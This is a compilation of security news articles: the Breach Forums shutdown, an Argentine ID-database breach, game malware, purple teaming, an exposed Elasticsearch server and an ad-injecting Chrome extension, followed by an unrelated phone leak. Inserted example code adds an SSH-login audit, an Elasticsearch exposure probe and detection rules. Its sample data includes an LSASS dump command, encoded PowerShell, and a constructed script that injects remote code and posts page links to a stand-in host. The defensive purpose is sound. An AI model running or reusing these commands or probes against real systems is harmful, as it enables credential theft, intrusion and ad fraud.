Breach Forums to Remain Offline Permanently


The decision to shut down Breach Forums came after the administrator noticed that someone had logged into an old forum CDN server on March 19th, 2023, at 1:34 EST, which they took as a sign that federal authorities had access to Fitzpatrick’s devices.

Hackread.com has learned that the infamous hacker and cybercrime forum Breach Forums has been permanently shut down. On March 18th, 2023, it was reported that Conor Brian Fitzpatrick (aka Pompompurin, aka Pom), the owner, founder, and administrator of Breach Forums, was arrested in New York.

The question of the forum’s future after Fitzpatrick’s arrest echoed across different forums, with speculation about whether it would be seized by authorities like its predecessor, Raid Forums.

The day the news of Fitzpatrick’s arrest surfaced, one of the forum’s administrators, who goes by the alias Baphomet, announced that they had taken over the forum to keep it running and protect it from seizure. They also claimed to have cut off all of Fitzpatrick’s access to the forum.

However, in a statement posted to the official Breach Forums Telegram channel earlier today, Baphomet announced the permanent shutdown of the forum. Baphomet apologized to forum users for any inconvenience and emphasized that the decision was made for the betterment and safety of everyone.

It is worth noting that Baphomet plans to start a new Breach Forums-like community in the near future. However, for now, all forum domains will be redirected to a website owned by Baphomet.

Reason for Sudden Shutdown

The initial plan of administrator Baphomet was to keep Breach Forums online, so what changed their mind? In their statement, the administrator explained that the decision to shut down the forum came after they noticed that someone had logged into an old forum CDN server on March 19th, 2023, at 1:34 EST, which in their view indicated that federal authorities had access to Fitzpatrick’s devices.

Baphomet stated that running a forum with the fear of law enforcement access would be risky, and the best solution for everyone’s safety was to permanently shut it down. Here’s what Baphomet had to say:

This will be my final update on Breached, as I've decided to shut it down. I'm aware this news will not please anyone, but it's the only safe decision now that I've confirmed that the glowies likely have access to Pom's machine.

As I said early on in all of this, anything related to production Breached infrastructure was locked down immediately - however I was kind enough to leave a few old, non-essential servers completely unchanged. One of those servers I left unchanged is an old CDN from months ago that no longer hosts any CDN files or configs but rather was used to just download large files from time to time.

Throughout the migration I checked to see if anything was going on that would cause concern during the migration. One of the servers checked was the old CDN server described above. It seems someone logged in on Mar 19, 1:34 EST prior to me logging into the server. 

Unfortunately this likely leads to the conclusion that someone has access to Pom's machine. Any servers we use are never shared with anyone else, so someone would have to know the credentials to that server to be able to login. I now feel like I'm put into a position where nothing can be assumed safe, whether it is our configs, source code, or information about our users - the list is endless. This means that I can't confirm the forum is safe, which has been a major goal from the start of this shitshow.

As for what this means now, it's complicated. Unlike when other communities go down and everyone scatters, stupidly I will still be around. I will redirect all the Breached domains to my baph.is domain. The Telegram group and channel will remain up for now, but I will make a new Telegram group for those interested in seeing what I have planned next. I will always be willing to sign a message to prove my identity to the community.

While the community of Breached will die, I'm going to continue conversations with some of the competitor forum admins and various service operators who reached out to me over the past few days. I'm hoping to work with some of those people to build a new community, that will have the best features of Breached while reducing the attack surfaces we never properly addressed. As with things like this, I have no doubt our userbase may be absorbed by another community but if there is patience then I hope to bring something back that will rival any other community that can take our place.

I'll be taking 24 hours from the sharing of this message to just rest and think. I'll be back online to talk with everyone, and we'll go from there. The domains for the time being shouldn't be seized, but I'll let the community know if any of that happens.

For now - see you, space cowboy.

Baphomet
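The finding that triggered the shutdown was an unexplained successful login on an old server. The following is an added example, not code from the article or from Baphomet, showing the check behind that finding: parse the sshd "Accepted" lines of a Debian-style auth.log (syslog timestamps, no year, so one is supplied) and flag every successful login whose source address is not on the operator's allowlist. A valid key or password arriving from an unknown address is precisely the signal that someone else holds the credentials. The log lines, host name and addresses are constructed (RFC 5737 documentation ranges), not taken from any real server.

```python
"""Added example: audit sshd 'Accepted' lines against an allowlist of operator
source addresses.  Everything below is constructed for illustration."""
import re
from datetime import datetime

# Matches the prefix of an OpenSSH success line as written to a syslog-style auth.log.
ACCEPTED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>publickey|password|keyboard-interactive/pam) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

# Constructed auth.log excerpt: the same key is accepted from two addresses.
SAMPLE_AUTH_LOG = """\
Mar 17 22:01:13 cdn-old sshd[1021]: Accepted publickey for deploy from 203.0.113.7 port 51022 ssh2: ED25519 SHA256:K4mQ1n
Mar 19 01:34:02 cdn-old sshd[1190]: Accepted publickey for deploy from 198.51.100.23 port 40518 ssh2: ED25519 SHA256:K4mQ1n
Mar 19 01:34:02 cdn-old sshd[1190]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Mar 19 09:12:40 cdn-old sshd[1302]: Failed password for root from 192.0.2.55 port 33001 ssh2
Mar 20 15:40:11 cdn-old sshd[1410]: Accepted password for deploy from 203.0.113.7 port 51500 ssh2
"""


def parse_accepted(log_text, year):
    """Yield one dict per successful login.  Syslog lines carry no year, so it is passed in."""
    for line in log_text.splitlines():
        m = ACCEPTED.match(line)
        if not m:
            continue
        ts = re.sub(r"\s+", " ", m["ts"])          # "Mar  9" -> "Mar 9"
        yield {
            "when": datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S"),
            "host": m["host"], "user": m["user"], "ip": m["ip"], "method": m["method"],
        }


def find_unexpected_logins(log_text, known_sources, year=2023):
    """Successful logins whose source address is not in the operator's allowlist."""
    return [e for e in parse_accepted(log_text, year) if e["ip"] not in known_sources]


def password_logins(log_text, year=2023):
    """Successful password logins: on a box meant to be key-only this is a finding by itself."""
    return [e for e in parse_accepted(log_text, year) if e["method"] == "password"]


if __name__ == "__main__":
    for e in find_unexpected_logins(SAMPLE_AUTH_LOG, known_sources={"203.0.113.7"}):
        print(f"{e['when']:%b %d %H:%M:%S} {e['host']}: {e['user']} via {e['method']} from {e['ip']}")
```

If the intruder has root on the host, the local auth.log can be edited, so corroborate with wtmp (`last`), any remote syslog copy, and the key fingerprint that sshd logs alongside the login.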

What’s Next?

Although the shutdown of Breach Forums may look like a win, it could prove a rabbit hole for investigators, cybersecurity journalists, and researchers. With no single well-known community to monitor, cybercriminals could move to Russian-language forums to dump stolen databases, a larger-scale threat to unsuspecting users and organizations.

It is worth noting that Russian-language hacker forums are already forming alliances with Chinese-speaking hacker groups, a combination that could prove a recipe for disaster for the defenders on the other side.



Hacker steals govt database with info of entire Argentine population


After the infamous La Gorra Leaks in 2017 and the exposure of Argentinian politicians and law enforcement officials in 2019, Argentina is back in the news for all the wrong reasons. This time, hackers have reportedly stolen a government database containing the personal information of the entire Argentine population, which means that more than 45 million people are now at risk of exploitation.

About the Hack

According to The Record, an Argentine government database known as RENAPER (Registro Nacional de las Personas/Argentina’s National Registry of Persons) was targeted. RENAPER hosts the country’s national registry, official ID card details, and photos of all 45.3 million citizens.


Reportedly, hackers managed to steal the ID card data of the entire population and are now trying to sell it in private circles. Given the trove of information this database contains, it could be a goldmine for threat actors, who can use it for scams and further attacks.

Screenshot shows the data being sold on a prominent hacker forum (Image: Hackread.com)

How did the Breach happen?

According to Argentinian media, the hacker breached the government’s IT network and stole ID card details. The breach took place in September, and the government evidently failed to protect its citizens’ identities.

The targeted department is responsible for issuing ID cards to all citizens; the data was stored in digital format and was accessible only to government agencies. It therefore seems likely that a security loophole allowed the hackers to infiltrate the network.

Entire Population’s ID Card Details Stolen

The Record reported that the first evidence that RENAPER was breached emerged earlier in October when a newly registered Twitter handle @AnibalLeaks published ID card photos of 44 well-known Argentinian celebrities, including president Alberto Fernández, football superstars Sergio Aguero and Lionel Messi, journalists, and political figures.

One day later, the personal details and images were also published on Twitter, and the hacker posted an ad on a popular hacking forum.

Government’s Response

The Argentinian government confirmed the breach three days later in a press release in which the Ministry of Interior explained that its security team had learned that a VPN account assigned to the Ministry of Health was used to query RENAPER for 19 photos at the very moment the photos were published on Twitter.


“The [RENAPER] database did not suffer any data breach or leak,” the ministry confirmed, adding that authorities are currently investigating 8 government employees for their possible involvement in the leak.

The hacker contradicted the government’s official statement when The Record contacted them, saying they had a copy of the RENAPER database. The hacker backed up the claim by sending the personal details, including the Trámite number, of an Argentinian national chosen by The Record.

“Maybe in a few days I’m going to publish [the data of] 1 million or 2 million people,” the hacker told The Record.




Minecraft declared the most malware-infected game


Malware has become a leading cause of compromise, infecting millions of devices worldwide every year. A new report from Atlas VPN says that the PC and mobile gaming community is currently a major target for malware authors, and that Minecraft is their favorite game to use as bait.

New Survey Reveals Startling Details

Atlas VPN researchers compiled a list of the most-targeted games for both mobile and PC, and Minecraft topped the chart on both platforms. According to the researchers, 184,887 PC players were affected after downloading malware hidden inside a Minecraft file.


In total, there were more than three million detections of infected Minecraft files on PC. On mobile devices, Minecraft-related malware affected 44,335 users, with antivirus software logging around 300,000 detections, according to Kaspersky Security Network figures.

It is understandable why malware developers are so keen on targeting Minecraft fans. The game is massively popular on both mobile and PC, for instance, as of 2021, Minecraft was home to over 131 million players.

303,827 Devices Affected Within a Year

In its survey, Atlas VPN concluded that between July 2020 and July 2021, around 303,827 devices got infected with malware spread via different malicious gaming software. Being the leading and most played game in the market, Minecraft attracted the highest number of malware since more than half of these 303,827 devices were affected by Minecraft-related malware.

Most Infected Games

Apart from Minecraft, many other games are on the radar of malware developers. These include:

  • Sims 4
  • PUBG
  • Free Fire
  • Among Us.

Among Us recorded 9,616 malware detections, PUBG 9,084, and Free Fire 6,065. On PC, Sims 4 and Minecraft attracted the most malware, followed by:

  • PUBG
  • Fortnite
  • Grand Theft Auto 5
  • Counter-Strike GO
  • League of Legends
  • Rocket League
  • FIFA 21
  • Need for Speed Heat.

How are Gamers Targeted?

Minecraft, Sims 4, and other games that rely on user-downloaded mods or modpacks are the prime targets of malware developers and scammers, since a large part of the experience comes from downloading additional files. Mods take the game to a new level and sharpen players’ competitiveness.

When content creators bundle several mods together, the result is called a modpack, which can transform the game. The problem is that downloading mods usually means visiting third-party services and websites, which is exactly where cybercriminals hide their malware.

How To Stay Safe?

Since mods are a malware hotspot, be careful when downloading them. There is no need to avoid mods altogether, but download them only from official and trusted sites. Every game with modding features has a hub where you can search for and download mods; for Minecraft, that is CurseForge, which hosts a vast catalog of mods and modpacks.


Moreover, never click on links or download files that promise cheating programs or hacks to help you gain an unfair edge over your competitors because it might be a malware payload. And whenever you feel like trying out a new game download it from the official website or store.




Motorola Moto G54 appears in all color options


The Motorola Moto G54 has just surfaced in all color options, following a leak from earlier this month. This is the best view of the Moto G54 we have thus far, thanks to Evan Blass aka @evleaks.

The Motorola Moto G54 will launch in three color options, and all of them are shown here

As you’ll see in the gallery below the article, there are three color variants of the phone shown here. Those are seemingly all the colors that Motorola will offer. We have black, blue, and green versions shown here.

The device will feature a flat display, with a centered display camera hole. All of that is clearly visible in the provided images. The bottom bezel will be thicker than the rest, which is not surprising.

On the back, the company will include two cameras inside the same camera island. Those cameras will sit in the top-left corner of the phone’s backplate. Motorola’s logo is also visible on the back, and the backplate is slightly curved towards the sides.

It will also include a 120Hz display, a 5,000mAh battery, and a 50MP main camera

This will be a mid-range phone, but it will still have rather interesting specs. We know that because some of them leaked before. The Moto G54 is tipped to feature a 6.5-inch fullHD+ display. That panel will offer a 120Hz refresh rate.

A 5,000mAh battery was also mentioned, as was a side-facing fingerprint scanner. Android 13 will come pre-installed on this smartphone, that’s for sure.

A 50-megapixel main camera was also mentioned in rumors, and it will offer OIS support. The last piece of information we have is that the device will include stereo speakers.

Its price tag is still a mystery, but it is expected to arrive in the near future. The Motorola Moto G53 arrived in December, but considering the timing of these rumors, the Moto G54 may launch sooner than that. We’ll have to wait and see.



How using the purple team approach helps in addressing cybercrime


Automated purple teaming is one of the best ways to address cybercrime, because it not only tests for deficiencies in existing security controls but also evaluates variations of threats that could defeat those controls. Let’s dig deeper into this approach.

An IBM report reveals that the cost of data breaches has reached record highs over the past year. The banking industry has also seen an exponential rise in ransomware attacks, with one study indicating that banks have seen a 1,318 percent increase in ransomware attacks in 2021. Cyber attacks are on the rise, and it is only logical to respond to them by fortifying defenses.

Cyber defense fortification is not just about having the best security controls, though. Even with the most advanced security tech, bad actors can still find their way into networks or IT assets if they manage to find vulnerabilities they can exploit. Hence, organizations should consider security validation as a critical part of their security posture.


One of the best ways to undertake security validation at present is purple teaming, an approach that entails the collaboration between the red (attack) and blue (defense) teams while still keeping them independent from each other. It significantly strengthens cyber defenses by taking advantage of the adversarial perspective in examining vulnerabilities and anticipating potential attacks.

In turn, purple teaming can serve an important role in addressing cybercrime. If this does not sound convincing enough, consider the following points.

Threshing out security weaknesses

Security validation is not just some supplementary security process implemented by organizations. It is crucial because it ascertains that the security controls put in place are functionally sound and capable of delivering the kind of protection expected from them. Testing security controls optimizes an organization’s security posture by spotting defects or weaknesses promptly and addressing them accordingly.

Given the massive volumes of attacks, though, it is impossible to keep up with the attempts to penetrate cyber defenses using manual security testing. Also, with the increasing sophistication of attacks, it is usually not enough for organizations to rely on their in-house cybersecurity teams. They need an adversarial perspective as well as a more efficient way to detect and deal with the attacks. This is where advanced automated purple team simulation comes in. 

Automated purple teaming is one of the best ways to address cybercrime because it does not only test for deficiencies in existing security controls. It also helps evaluate variations of threats and lateral movement that may defeat defenses unexpectedly. With the help of up-to-date threat intelligence and a shared, standardized framework for describing adversary behaviour such as MITRE ATT&CK, organizations can build security strategies capable of addressing even zero-day attacks and the complex schemes of bad actors.

Purple teaming, by the way, does not mean the creation of a new team with members coming from the red and blue teams. It is mainly about sharing insights on how to improve attack and defense simulations without necessarily letting each other know what the red and blue teams are doing. Purple teaming enables collaboration to help explore scenarios that would otherwise be left unexplored when the red and blue teams are virtually working in silos.
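To make the loop described above concrete, here is an added example, not code from the article or from any vendor it mentions: a minimal automated purple-team exercise. The red side replays constructed attack events tagged with MITRE ATT&CK technique IDs (T1059.001 PowerShell, T1003.001 LSASS memory dumping, T1110.001 password guessing), the blue side runs simple detection rules over the same telemetry, and a scorecard says for each technique whether it was detected, missed by a rule that exists, or not covered by any rule. Hosts, users, command lines and the brute-force threshold are all constructed for illustration.

```python
"""Added example: a minimal automated purple-team loop with an ATT&CK-keyed scorecard.
Sample telemetry, rules and thresholds are constructed for illustration."""
import re
from collections import defaultdict

# Constructed sample telemetry.  "technique" is the ATT&CK ID the red side
# tagged the event with; None marks benign background activity.
SAMPLE_EVENTS = [
    {"technique": "T1059.001", "type": "process", "host": "ws01",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"},
    {"technique": None, "type": "process", "host": "ws02",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"technique": "T1003.001", "type": "process", "host": "ws01",
     "cmdline": "procdump.exe -ma lsass.exe C:\\temp\\lsass.dmp"},
] + [
    {"technique": "T1110.001", "type": "auth", "host": "dc01",
     "user": "svc_backup", "result": "failure"}
    for _ in range(4)                      # only four failures: a "variation" below a naive threshold
] + [
    {"technique": None, "type": "auth", "host": "dc01",
     "user": "alice", "result": "failure"},
]

ENCODED_PS = re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.I)


def rule_encoded_powershell(events):
    """Blue-side rule: PowerShell launched with an encoded command."""
    return [e for e in events
            if e["type"] == "process" and ENCODED_PS.search(e["cmdline"])]


def make_bruteforce_rule(threshold):
    """Blue-side rule: at least `threshold` auth failures for one account on one host."""
    def rule(events):
        groups = defaultdict(list)
        for e in events:
            if e["type"] == "auth" and e["result"] == "failure":
                groups[(e["host"], e["user"])].append(e)
        return [e for g in groups.values() if len(g) >= threshold for e in g]
    return rule


def build_detections(bruteforce_threshold=5):
    """Technique ID -> rule.  T1003.001 deliberately has no rule: surfacing
    exactly that kind of gap is what the exercise is for."""
    return {
        "T1059.001": rule_encoded_powershell,
        "T1110.001": make_bruteforce_rule(bruteforce_threshold),
    }


def run_exercise(events, detections):
    """Return (verdicts, false_positives).  verdicts maps every technique the red
    side exercised to 'detected', 'missed' or 'no_rule'; false_positives counts
    the benign events each rule also fired on."""
    exercised = sorted({e["technique"] for e in events if e["technique"]})
    verdicts, false_positives = {}, {}
    for tech in exercised:
        rule = detections.get(tech)
        if rule is None:
            verdicts[tech] = "no_rule"
            continue
        hits = rule(events)                # rules see all telemetry, not just the attack events
        verdicts[tech] = "detected" if any(h["technique"] == tech for h in hits) else "missed"
        false_positives[tech] = sum(1 for h in hits if h["technique"] is None)
    return verdicts, false_positives


def coverage(verdicts):
    """Fraction of exercised techniques that were detected."""
    return sum(1 for v in verdicts.values() if v == "detected") / len(verdicts)


if __name__ == "__main__":
    verdicts, fps = run_exercise(SAMPLE_EVENTS, build_detections())
    for tech, verdict in verdicts.items():
        print(f"{tech}: {verdict} (false positives: {fps.get(tech, '-')})")
    print(f"coverage: {coverage(verdicts):.0%}")
```

Running the exercise with the default threshold reports the LSASS dump as `no_rule` and the four-failure password guessing as `missed`; lowering the threshold to 4 via `build_detections(bruteforce_threshold=4)` turns the latter into `detected` without adding false positives on the benign events, which is the kind of tuning decision the red and blue sides settle together.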

Countering the commonplaceness of vulnerable software

A survey report entitled Modern Application Development Security reveals that nearly five in every ten organizations knowingly release vulnerable code, making available to the public software or applications that have not gone through rigorous security testing. This affects not only the software or app providers but, more importantly, the end users: it means vulnerabilities that cybercriminals can exploit to steal data, interrupt operations, or spread malicious software.

This tendency to push vulnerable software happens mainly because of very strict deadlines imposed on app developers. There are also instances when developers just do not have enough time to address security problems because the vulnerabilities have been discovered too late.

Purple teaming provides a good solution for this common problem by helping organizations undertake thorough evaluations of the security of the applications they are using. Companies can employ purple teaming to scrutinize their systems and discover various weaknesses in their software, including web applications, that have the potential to become serious cybersecurity incidents.

Purple teaming on web app use is a boon to many businesses that are now relying on online services or web-based platforms instead of using conventional client-based apps. Web apps are favorite targets for many cybercriminals because they can find various useful data that are often kept online for convenient access. Also, cyber attackers understand that they can “achieve better outcomes” if they manage to paralyze business operations after disrupting an organization’s core web apps.

Also worth noting, the OWASP Top 10 was updated in 2021 to reflect the growing seriousness of software security issues. Broken Access Control now tops the list, based on how frequently the Common Weakness Enumeration (CWE) entries mapped to it were observed in tested web apps. This means organizations need to pay more attention to the security of the web applications they are using.

In a way, purple teaming can plug security issues that have been left unaddressed by the software developers. Organizations may not be able to plug these security gaps by modifying the app codes, but they can institute changes or new measures to prevent software vulnerabilities from contaminating the rest of their system and IT assets.

Addressing the human error factor

One IBM study says that human error is the leading cyber threat to businesses in 2021. These errors can be attributed to carelessness, switching to new arrangements that affect the cybersecurity posture, configuration errors, and the failure or refusal to update among others. 

As fraud prevention tech expert Mus Huseyin declares, “Corporates seeking to protect digital assets must face an uncomfortable truth: the biggest threat to cybersecurity lies within the company.” Security technologies have continued improving significantly, but it appears the human problem in cybersecurity has remained largely the same over the years.

This is why there are still many successful attacks that take advantage of human error. A VentureBeat report says phishing attacks on banking customers rose by 30 percent in 2020. There are also reports of dramatic increases in human-hacking attacks across different digital channels. Social engineering continues to be a critical threat to all kinds of organizations because of the human error factor.


Purple teaming is an effective way to address human errors in cybersecurity. By bringing together the adversarial perspective and expertise of cyber defense professionals, it becomes easier to detect and eliminate potential vulnerabilities in systems that are linked to human errors. Mistakes in configurations, problematic threat handling protocols, protocols that allow employees to ignore security procedures, and other similar weaknesses can be detected and addressed through purple teaming.

Cybercrime prevention and impact mitigation

Prevention is always better than cure, and this is what purple teaming does as it examines the effectiveness of security controls in catching and stopping cyber attacks. What makes purple teaming even better is that it can also help with mitigation. The purple team modules in automated cybersecurity platforms, for example, are designed to provide quick options on how to deal with detected threats or attacks.

Cybercrimes succeed because of poor cyber defenses. To strengthen these defenses, organizations should deem security validation particularly through purple teaming as something essential for their security posture.




Data analytics firm exposed 2m Instagram and TikTok users’ data


The victims of this “data leak” also include celebrities like Alicia Keys, Loren Gray, Kylie Jenner, Ariana Grande, and Kim Kardashian.

The cybersecurity team at Safety Detectives, led by Anurag Sen, discovered an unsecured ElasticSearch server belonging to IGBlade.com, a social media analytics site. The server stored scraped data of millions of social media users. The data was taken from TikTok and Instagram.

Reportedly, at least 2.6 million user profiles have been exposed, equivalent to over 3.6 GB of data. The researchers dubbed it a shocking discovery since data scraping is banned on most social media websites, although it isn’t illegal.

About IGBlade.com

IGBlade.com is a Romanian website that collects social media users’ data to offer its clients an in-depth understanding of an Instagram or TikTok account. The platform has gathered more than 30 different metrics on millions of social media accounts.


It then consolidates this information into a “navigable social account search engine” that displays critical data such as followers rate, demographics stats, engagement rate, data visualizations, account history, etc. To obtain these social media insights, users are required to create an account on IGBlade.

What was Exposed?

Part of the exposed data were screenshots and links to profile pictures and other types of scraped personal data of social media users. It is worth noting that all data on the exposed database was publicly available.

However, the incident has yet again ignited the debate on the controversial use of data scraping. Researchers claim that the data was left exposed without any encryption or password protection in place. The exposed data included:

  • Full names
  • Usernames
  • location data
  • About details
  • Profile pictures
  • Phone numbers
  • Email addresses
  • Engagement rate metrics
  • Follower counts & following counts.
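The root cause here is an Elasticsearch HTTP endpoint that answered anonymous requests. The following is an added example, not part of the article or of Safety Detectives’ tooling: an offline-testable probe that classifies whether an Elasticsearch endpoint is reachable, demands authentication, or serves its cluster description and index listing to anyone. It uses only the real `/` and `/_cat/indices?format=json` endpoints; `fetch` is injectable so the classifier runs against constructed responses, and `http_fetch` is the real transport for hosts you are authorised to test. All hostnames, cluster names and responses below are constructed.

```python
"""Added example: classify an Elasticsearch endpoint's exposure from its anonymous
responses.  Hostnames and sample responses are constructed for illustration."""
import json
import urllib.error
import urllib.request


def http_fetch(url, timeout=5):
    """Real transport: GET url and return (status, body); (None, '') if unreachable."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:          # 401/403/404 still carry a body
        return err.code, err.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None, ""


def classify_es(base_url, fetch=http_fetch):
    """Return (verdict, details).  verdict is one of 'unreachable', 'auth_required',
    'root_only' (cluster info readable, index data not) or 'open', else 'unknown'."""
    base = base_url.rstrip("/")
    status, body = fetch(base + "/")
    if status is None:
        return "unreachable", {}
    if status in (401, 403):                       # security enabled or an auth proxy in front
        return "auth_required", {}
    if status != 200:
        return "unknown", {}
    try:
        info = json.loads(body)
    except ValueError:
        return "unknown", {}
    if not isinstance(info, dict) or "cluster_name" not in info:
        return "unknown", {}
    # The root document answered anonymously; check whether index data does too.
    status2, body2 = fetch(base + "/_cat/indices?format=json")
    if status2 in (401, 403):
        return "root_only", {"cluster": info.get("cluster_name")}
    try:
        indices = json.loads(body2) if status2 == 200 else []
    except ValueError:
        indices = []
    details = {
        "cluster": info.get("cluster_name"),
        "version": info.get("version", {}).get("number"),
        "indices": [i.get("index") for i in indices],
        "docs": sum(int(i.get("docs.count") or 0) for i in indices),
    }
    return "open", details


# Constructed responses standing in for two hypothetical hosts.
SAMPLE_RESPONSES = {
    "http://es.example.invalid:9200/": (200, json.dumps({
        "name": "node-1", "cluster_name": "scraper-analytics",
        "version": {"number": "7.10.2"}, "tagline": "You Know, for Search"})),
    "http://es.example.invalid:9200/_cat/indices?format=json": (200, json.dumps([
        {"index": "instagram_profiles", "docs.count": "2100000", "store.size": "2.9gb"},
        {"index": "tiktok_profiles", "docs.count": "500000", "store.size": "700mb"}])),
    "http://locked.example.invalid:9200/": (401, json.dumps({"error": {
        "type": "security_exception",
        "reason": "missing authentication credentials for REST request"}})),
}


def fake_fetch(url, timeout=5):
    """Offline stand-in for http_fetch backed by SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(url, (None, ""))


if __name__ == "__main__":
    for host in ("http://es.example.invalid:9200", "http://locked.example.invalid:9200"):
        verdict, details = classify_es(host, fetch=fake_fetch)
        print(host, verdict, details)
```

An `open` verdict with a non-empty index list is the situation described in this article. The fix on the Elasticsearch side is to enable authentication and TLS on the HTTP layer (`xpack.security.enabled: true` together with `xpack.security.http.ssl.enabled: true`) and to bind the node to a private interface rather than exposing port 9200 to the internet.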

Some celebrities were also affected, including:

  • Alicia Keys
  • Loren Gray
  • Kylie Jenner
  • Ariana Grande
  • Kim Kardashian
Kim Kardashian’s data (Left) – Loren Gray’s data including her business phone number (Right)

According to Safety Detectives’ blog post,

“The scraped data of users on the server is the same data that features each user’s corresponding IGBlade.com page, and the database often provides links back to IGBlade. This is how we know the database belongs to IGBlade.com,” researchers noted.

The exposed data was available online for more than a month until Safety Detectives’ researchers discovered it on July 5 and notified IGBlade. The company secured it on the same day.




Ad-blocker Chrome extension AllBlock injected ads in Google searches


AllBlock was available on Google Chrome’s Web Store where it is marketed as a potent Ad Blocker focusing on Facebook and YouTube to prevent pop-ups.

Google maintains that it takes the security of Chrome extensions very seriously and regularly vets them to prevent abuse. However, a new report from Imperva suggests that Google is not doing that job as thoroughly as it claims.

Chrome’s Ad-Blocker Extension Displaying Ads on Google

Security vendor Imperva’s Sillam and Ron Masas reported that a Google Chrome extension called AllBlock designed to block ads is injecting ads into Chrome and Opera.


Although the extension does block ads, it runs a background script that injects a piece of JavaScript into every tab the user opens. This code communicates with remote servers and downloads and installs a payload connected to the operators of an ad-injection scam.

“When the user clicks on any modified links on the webpage, he will be redirected to an affiliate link. Via this affiliate fraud, the attacker earns money when specific actions like registration or sale of the product take place,” Imperva researchers observed.

The payload then retrieves a series of unwanted ads, most of which are not from legitimate sources, and includes affiliate links. AllBlock was available on Google Chrome’s Web Store where it is marketed as a potent Ad Blocker focusing on Facebook and YouTube to prevent pop-ups. It has now been removed from Opera add-ons and Chrome Web Store.

What is Ad Injection?

Ad injection is a method of inserting ads or links into a web page that isn’t supposed to host them. Scammers can earn money from advertisements by injecting unrelated ads or redirect unsuspecting users to affiliate links to earn a commission.


Imperva researchers identified such a campaign in August 2021 where several previously unknown domains were found to be distributing an ad injection script that would send legit URLs to a remote server and, in response, obtained a list of redirection domains. Consequently, when a user clicked on an altered link, they were redirected to another page, usually an affiliate link.

Ad injection scripts may feature evasion techniques such as excluding Russian search engines, actively checking for Firebug variables, and clearing the debugging console every 100 ms. In the AllBlock ad-injection scam, Imperva researchers found the script they had been looking for since August in the extension’s bg.js.
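The behaviours listed above are also useful as static triage indicators when reviewing an extension before installing it. The following is an added example, not code from Imperva’s report or from the AllBlock extension: a small scanner that looks through an extension’s JavaScript for the traits the report describes (remote script injection into tabs, link rewriting and href exfiltration, Russian search-engine exclusions, a Firebug check and a console-clearing loop) and rates the script. The two scripts it scans are constructed stand-ins, not the real bg.js, and the domains in them are hypothetical.

```python
"""Added example: regex-based triage of extension JavaScript for ad-injection traits.
The sample scripts and domains below are constructed, not from any real extension."""
import re

# Constructed stand-in for an ad-injecting background script.
SAMPLE_INJECTOR_BG_JS = r'''
const SKIP = ["yandex.", "mail.ru", "rambler."];            // leave RU search engines alone
const ok = h => !SKIP.some(x => h.includes(x));
setInterval(function () { console.clear(); }, 100);         // hide traces from devtools
if (window.console && window.console.firebug) { throw 0; }  // bail out if Firebug is present
chrome.tabs.onUpdated.addListener((id, info, tab) => {
  if (info.status === "complete" && ok(tab.url))
    chrome.tabs.executeScript(id, {code:
      'var s=document.createElement("script");s.src="https://cdn.example.invalid/loader.js";document.head.appendChild(s);'});
});
fetch("https://api.example.invalid/links", {method: "POST",
  body: JSON.stringify([...document.links].map(a => a.href))})
  .then(r => r.json())
  .then(map => { for (const a of document.links) if (map[a.href]) a.href = map[a.href]; });
'''

# Constructed stand-in for a plain request-blocking ad blocker.
SAMPLE_BLOCKER_BG_JS = r'''
chrome.webRequest.onBeforeRequest.addListener(
  () => ({cancel: true}),
  {urls: ["*://*.doubleclick.net/*", "*://ads.example.invalid/*"]},
  ["blocking"]);
'''

# Each indicator maps to one behaviour named in the report; all are heuristics.
INDICATORS = {
    "console_clear_loop": re.compile(r"setInterval\s*\(.*?console\.clear\s*\(\s*\).*?,\s*\d{1,3}\s*\)", re.S),
    "firebug_check": re.compile(r"console\.firebug"),
    "ru_search_exclusion": re.compile(r"\b(?:yandex|mail\.ru|rambler)\b", re.I),
    "remote_script_tag": re.compile(r"createElement\(\s*['\"]script['\"]\s*\).*?\.src\s*=\s*['\"]https?://", re.S),
    "tab_code_injection": re.compile(r"(?:chrome|browser)\.(?:tabs|scripting)\.executeScript"),
    "link_rewrite": re.compile(r"document\.links.*?\.href\s*=", re.S),
    "href_exfil": re.compile(r"fetch\(\s*['\"]https?://.*?(?:document\.links|\[href\]|\.href)", re.S),
}


def triage(source):
    """Return (verdict, sorted indicator names).  'likely ad-injector' needs both an
    injection trait and a link-tampering trait; two or more traits is 'suspicious'."""
    found = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    injects = {"remote_script_tag", "tab_code_injection"} & set(found)
    tampers = {"link_rewrite", "href_exfil"} & set(found)
    if injects and tampers:
        verdict = "likely ad-injector"
    elif len(found) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, found


if __name__ == "__main__":
    for label, src in (("injector", SAMPLE_INJECTOR_BG_JS), ("blocker", SAMPLE_BLOCKER_BG_JS)):
        verdict, found = triage(src)
        print(f"{label}: {verdict} {found}")
```

Obfuscated or remotely loaded code defeats simple pattern matching, which is exactly why the report notes the payload was fetched from a remote server at run time; treat a clean static result as necessary, not sufficient, and review the permissions the extension requests (`tabs`, `<all_urls>`, `webRequest`) against what an ad blocker actually needs.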

How is The Extension Marketed?

It is still unclear how AllBlock is distributed or promoted. According to Imperva, the scammers are probably using other extensions in this campaign as well. The researchers could not identify the origin of the attack because of the way the malicious script was injected.

“The script we first observed was injected via a script tag pointing to a remote server where the AllBlock extension injects the malicious code directly to the active tab,” Imperva’s report revealed.

This indicates a larger campaign at work using different delivery methods and extensions, which might be connected with the PBot campaign.




Best Buy’s latest flash sale includes a crazy good deal on the Xbox Series S


